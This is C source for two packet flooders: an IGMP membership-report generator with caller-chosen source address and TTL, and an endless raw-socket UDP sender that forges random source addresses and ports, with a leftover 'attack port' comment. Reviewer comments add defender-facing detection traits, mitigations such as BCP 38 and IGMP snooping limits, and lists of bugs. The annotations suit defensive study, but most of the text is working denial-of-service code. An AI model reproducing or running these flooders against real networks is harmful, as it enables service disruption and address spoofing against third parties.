/*
 * igmp_scan <ttl> <iface> <src> <dest> <count>
 *
 * Hand-builds a 32-byte IPv4 datagram carrying an IGMP message of type 0x16
 * (IGMPv2 membership report) and sends it through an AF_PACKET socket on the
 * named interface, once per group. The group starts at <dest> and is advanced
 * by 0x10000 (host order, i.e. the second octet) after every packet.
 *
 * Defender's view of the traffic: unsolicited membership reports whose source
 * address and TTL come straight from the command line, for a run of distinct
 * groups from one port. IGMP is normally sent with TTL 1 (RFC 2236), so any
 * other TTL is anomalous. IGMP snooping with per-port group limits or report
 * rate limits is the usual control for this pattern.
 *
 * Opening an AF_PACKET socket needs CAP_NET_RAW (packet(7)).
 *
 * NOTE(review): s_8/s_16/s_32, ip_sum and iface_index are defined elsewhere;
 * the comments below assume s_N stores an N-bit value at the given byte
 * offset in network order -- confirm against their definitions.
 */
int main(int argc, char *argv[])
{
  int fd;
  byte_t pkt[32];
  int ttl;
  in_addr_t src_ip, dst_ip, group_ip;
  struct sockaddr_ll ll;
  unsigned count;
  unsigned ifindex;

  if (argc < 6) {
    printf("Usage igmp_scan <ttl> <iface> <src> <dest> <count>\n");
    exit(1);
  }

  /* SOCK_DGRAM packet socket: the link-layer header is not part of pkt, the
     destination MAC is supplied through the sockaddr_ll passed to sendto(). */
  fd = socket(PF_PACKET, SOCK_DGRAM, ETH_P_IP);
  if (fd == -1) {
    perror("eth_open");
    exit(1);
  }

  /* NOTE(review): atoi() reports no errors and nothing here range-checks the
     result; ttl is later stored into a single byte. */
  ttl = atoi(argv[1]);
  ifindex = iface_index(argv[2]);
  /* ifindex is unsigned, so this compares against (unsigned)-1. */
  if (ifindex == -1) {
    printf("Bad interface name '%s'\n", argv[2]);
    exit(1);
  }
  /* NOTE(review): inet_addr() failure (INADDR_NONE) is not checked, and <dest>
     is never checked to be a multicast (224.0.0.0/4) address. */
  src_ip = inet_addr(argv[3]);
  dst_ip = inet_addr(argv[4]);
  /* NOTE(review): a count of 0 is not rejected. The loop below is do/while
     with a pre-decrement on an unsigned, so 0 wraps instead of stopping
     after zero packets. Validate before use. */
  count = atoi(argv[5]);

  do {
    group_ip = dst_ip;
    memset(pkt, 0, sizeof(pkt));
    s_8 (pkt, 0, 0x46);               /* version 4, IHL 6: 20-byte header + 4 option bytes */
    s_16(pkt, 2, sizeof(pkt));        /* total length = 32 */
    s_8 (pkt, 8, ttl);                /* TTL as given on the command line */
    s_8 (pkt, 9, 2);                  /* protocol 2 = IGMP */
    /* inet_addr() already returns network byte order; the extra htonl()
       presumably compensates for how s_32 stores its argument -- confirm. */
    s_32(pkt, 12, htonl(src_ip));     /* source address, caller-chosen */
    s_32(pkt, 16, htonl(dst_ip));     /* destination = the group itself */
    s_32(pkt, 20, 0x94040000); /* router alert option: type 0x94, length 4, value 0 */
    s_8 (pkt, 24, 0x16); /* IGMP type: membership report */
    s_32(pkt, 28, htonl(group_ip));   /* IGMP group address field */
    /* Checksums go last, after every field they cover has been written. */
    s_16(pkt, 26, ip_sum(pkt+24, 8)); /* igmp csum over the 8-byte IGMP message */
    /* NOTE(review): the sum covers all 32 bytes, not just the 24-byte header,
       and is then adjusted by 0x100; the reason is not visible here. */
    s_16(pkt, 10, ip_sum(pkt, 32)-0x100); /* ip csum */

    /* NOTE(review): ll is never zeroed, so sll_addr[6..7] and any padding are
       indeterminate when handed to sendto(). */
    ll.sll_family = AF_PACKET;
    ll.sll_protocol = htons(ETH_P_IP);
    ll.sll_ifindex = ifindex;
    ll.sll_hatype = htons(ARPHRD_ETHER);
    ll.sll_pkttype = PACKET_MULTICAST;
    ll.sll_halen = 6;
    /* Destination MAC follows the IPv4 multicast mapping: 01:00:5e followed by
       the low 23 bits of the group address. */
    ll.sll_addr[0] = 1;
    ll.sll_addr[1] = 0;
    s_32(ll.sll_addr, 2, (0x5e<<24) | (ntohl(group_ip) & 0x7FFFFF));

    /* NOTE(review): the return value is ignored, so send failures are silent. */
    sendto(fd, pkt, sizeof(pkt), 0, (struct sockaddr *)&ll, sizeof(ll));

    /* Next group: +0x10000 in host order bumps the second octet. */
    dst_ip = htonl(ntohl(dst_ip)+0x10000);
    /* The only pacing: a 1 microsecond sleep whenever count is a multiple of 10. */
    if ((count % 10) == 0) {
      usleep(1);
    }
  } while (--count);

  /* fd is never closed explicitly; it is released at process exit. */
  return 0;
}
/*
 * udp_send - emit UDP datagrams with a hand-built IPv4 header over a raw
 * socket, in an unbounded loop, using the settings in the global `config`.
 *
 * Returns 1 if the socket cannot be opened, IP_HDRINCL cannot be set, or
 * sendto() fails. The loop has no other exit, so the final `return 0` is
 * unreachable.
 *
 * What the code puts on the wire (useful as detection traits):
 *   - source address rewritten per packet: random_lip() when
 *     config.udp_sourceip is "*", otherwise the configured address;
 *   - source port random in 1..65535 when config.udp_sourceport is 0;
 *   - IP ID random per packet, TOS 0, TTL 255 at origin, no fragmentation;
 *   - UDP checksum left at 0 (every assignment to uh_sum is commented out);
 *   - payload of config.udp_pkgsize bytes, all zero (from the memset).
 * Because the source address is forged, source-address validation at the
 * network edge (BCP 38 / uRPF) is the control that stops this traffic from
 * leaving; downstream, the fixed-size zero payload with a zero UDP checksum
 * is the stable signature.
 *
 * Raw sockets need CAP_NET_RAW (raw(7)).
 *
 * NOTE(review): config, random_int, random_lip and ip_sum are defined
 * elsewhere; their behaviour is taken from their names -- confirm.
 */
int udp_send( )
{
    struct ip *ipH;
    struct udphdr *udpH;
    char *packet;
    int rawsock, sport;
    struct sockaddr_in sin;
    unsigned long saddr, daddr;
    /* NOTE(review): ip1, ip2, ip3 and ip are never used in this function. */
    char ip1[4], ip2[4], ip3[4], ip[4];
    /* NOTE(review): config.udp_pkgsize is not range-checked; pkgsize is an int
       built from size_t terms. */
    int pkgsize = sizeof (struct ip) + sizeof(struct udphdr) + config.udp_pkgsize;
    /* NOTE(review): the malloc() result is used below without a NULL check and
       is never freed; every return path leaks it. */
    packet = (char *) malloc(sizeof (struct ip) + sizeof(struct udphdr) + config.udp_pkgsize);
    /* Both header pointers alias the single packet buffer. */
    ipH = (struct ip *) packet;
    udpH = (struct udphdr *) (packet + sizeof(struct ip));
    memset(packet, 0, pkgsize);
    /* NOTE(review): INADDR_NONE from inet_addr() is not checked. */
    daddr = inet_addr(config.udp_targetip);
    // ip header
    ipH->ip_v = 4; /* version */
    ipH->ip_hl = 5; /* header length: 5 words = 20 bytes, no options */
    ipH->ip_tos = 0x00; /* type of service */
    //ipH->ip_len = pkgsize; /* total length */
    ipH->ip_ttl = 255; /* time to live */
    ipH->ip_off = 0; /* fragment offset field */
    ipH->ip_id = htons(random_int(1, 65535)); /* identification */
    ipH->ip_p = IPPROTO_UDP; /* protocol */
    ipH->ip_sum = 0; /* checksum */
    //ipH.ip_src.s_addr = saddr; /* source address */
    ipH->ip_dst.s_addr = daddr; /* dest address */
    //ipH.ip_sum = ip_sum((unsigned short*)&ipH,sizeof(ipH));// checksum
    // udp header
    //udpH.uh_sport = htons( sport ); // 16-bit source port
    udpH->uh_dport = htons( config.udp_targetport ); // 16-bit destination port
    udpH->uh_ulen = htons(sizeof(struct udphdr ) + config.udp_pkgsize); // 16-bit UDP length
    //udpH.uh_sum = 0; // 16-bit checksum
    //udpH.uh_sum = DoS_cksum((unsigned short*)&udp.udpH, pkgsize);// UDP checksum
    /* NOTE(review): sin is not zeroed; sin_port and sin_zero stay
       indeterminate because only family and address are assigned. */
    sin.sin_family = AF_INET;
    //sin.sin_port = htons(53); // attack port
    sin.sin_addr.s_addr = daddr;
    rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if( rawsock < 0 ) {
        printf("[-]Error to open socket.\n");
        return 1;
    }
    const int optVal = 1;
    /* NOTE(review): socket option names are not bit flags. OR-ing two of them
       names a different option number, and the return value is not checked. */
    setsockopt(rawsock, SOL_SOCKET,SO_REUSEADDR | SO_BROADCAST, &optVal, sizeof(optVal));
    /* IP_HDRINCL: the caller supplies the IPv4 header, including the source. */
    if( setsockopt( rawsock , IPPROTO_IP , IP_HDRINCL , &optVal , sizeof( optVal ) ) < 0 ) {
        /* NOTE(review): rawsock is not closed on this path. */
        printf("[-]Error to setsockopt to the socket.\n");
        return 1;
    }
    /* NOTE(review): sizeof(packet) is the size of the pointer, not of the
       buffer, and it is a size_t passed to %d (mismatched specifier). */
    printf("packet=%d, len=%d, pkgsize=%d\nsending ...\n", sizeof(packet), config.udp_pkgsize, pkgsize );
    while(1) {
        /* Per-packet source address and port selection. */
        saddr = ( strcmp(config.udp_sourceip, "*") == 0 ) ? random_lip() : inet_addr((config.udp_sourceip));
        sport = config.udp_sourceport == 0 ? random_int(1, 65535) : config.udp_sourceport;
        ipH->ip_id = htons(random_int(1, 65535));
        ipH->ip_src.s_addr = saddr;
        /* NOTE(review): &ipH / sizeof(ipH) refer to the pointer variable, not
           the header it points to. raw(7) documents that Linux fills in the
           IP checksum and total length for IP_HDRINCL sockets, so on-wire
           packets presumably still carry a valid IP checksum -- confirm. */
        ipH->ip_sum = ip_sum((unsigned short*)&ipH, sizeof(ipH));
        udpH->uh_sport = htons( sport );
        ipH->ip_len = pkgsize; /* stored without htons() */
        //udpH->uh_sum = ip_sum((unsigned short*)&udpH, sizeof(udpH));
        if( sendto( rawsock , packet, pkgsize , 0 , ( struct sockaddr *) &sin , sizeof(sin)) < 0 ) {
            /* NOTE(review): returns without closing rawsock or freeing packet. */
            printf("[-]Error to sendto : %s[%d].\n" , strerror(errno), errno );
            return 1;
        }
        /* Optional pacing between packets; 0 or less means no delay. */
        if (config.udp_sleeptime > 0) usleep(config.udp_sleeptime);
    }
    return 0;
}